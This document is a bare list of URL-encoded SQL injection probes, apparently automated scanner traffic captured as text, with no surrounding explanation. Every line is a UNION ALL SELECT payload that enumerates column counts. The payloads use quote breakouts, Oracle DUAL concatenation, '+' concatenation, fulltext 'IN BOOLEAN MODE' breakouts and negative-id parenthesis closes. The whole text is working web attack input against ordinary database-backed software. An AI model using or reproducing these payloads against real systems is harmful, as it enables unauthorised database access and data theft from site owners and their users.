1%27%20WHERE%203244%3D3244%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%206796%3D6796%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%207851%3D7851%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%204803%3D4803%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%204583%3D4583%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%206572%3D6572%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%201870%3D1870%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%206603%3D6603%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%205721%3D5721%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%204558%3D4558%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207420%3D7420%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%209961%3D9961%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207315%3D7315%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%206661%3D6661%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207633%3D7633%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207461%3D7461%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27LWmb%27%20FROM%20DUAL%20WHERE%207044%3D7044%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Ftem%27%20FROM%20DUAL%20WHERE%207506%3D7506%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27SRdN%27%20FROM%20DUAL%20WHERE%204651%3D4651%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27bDzs%27%20FROM%20DUAL%20WHERE%202718%3D2718%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27LCQW%27%20FROM%20DUAL%20WHERE%204609%3D4609%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27mKsv%27%20FROM%20DUAL%20WHERE%208234%3D8234%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27UZEl%27%20FROM%20DUAL%20WHERE%201469%3D1469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Oaen%27%20FROM%20DUAL%20WHERE%208660%3D8660%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27LFfW%27%20FROM%20DUAL%20WHERE%208983%3D8983%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Xuvr%27%20FROM%20DUAL%20WHERE%207678%3D7678%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27EWSG%27%20WHERE%206214%3D6214%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27TNxK%27%20WHERE%208595%3D8595%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27ioGZ%27%20WHERE%203638%3D3638%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27dplr%27%20WHERE%205875%3D5875%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27QtFS%27%20WHERE%205331%3D5331%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27ZwZg%27%20WHERE%207331%3D7331%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27yWXW%27%20WHERE%203686%3D3686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Wpde%27%20WHERE%209086%3D9086%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27lAGh%27%20WHERE%205880%3D5880%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27JArB%27%20WHERE%202651%3D2651%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20HPjx%20WHERE%205842%3D5842%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20gCZm%20WHERE%201483%3D1483%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20kxWk%20WHERE%203722%3D3722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20JzVn%20WHERE%202997%3D2997%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20sOnh%20WHERE%208673%3D8673%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20Ptvs%20WHERE%201662%3D1662%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20fiXZ%20WHERE%204960%3D4960%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20eJXg%20WHERE%208029%3D8029%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20IHus%20WHERE%206900%3D6900%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20VREI%20WHERE%202857%3D2857%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27eQSM%27%20WHERE%201504%3D1504%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27SfyZ%27%20WHERE%207358%3D7358%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27jhFK%27%20WHERE%208256%3D8256%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27LuOE%27%20WHERE%203105%3D3105%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27jlcM%27%20WHERE%204839%3D4839%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27sQjp%27%20WHERE%201283%3D1283%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27FmLe%27%20WHERE%204632%3D4632%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27eMTQ%27%20WHERE%208773%3D8773%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27tYAa%27%20WHERE%208160%3D8160%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27hCNI%27%20WHERE%202676%3D2676%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -7741%29%20UNION%20ALL%20SELECT%205267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267--%20 -2210%29%20UNION%20ALL%20SELECT%201662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662--%20 -3845%29%20UNION%20ALL%20SELECT%201558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558--%20 -5711%29%20UNION%20ALL%20SELECT%205671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671--%20 -4134%29%20UNION%20ALL%20SELECT%209984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984%2C9984--%20 -9651%29%20UNION%20ALL%20SELECT%201175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175%2C1175--%20 -5566%29%20UNION%20ALL%20SELECT%205328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328%2C5328--%20 -3573%29%20UNION%20ALL%20SELECT%204646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646%2C4646--%20 -4201%29%20UNION%20ALL%20SELECT%207684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684%2C7684--%20 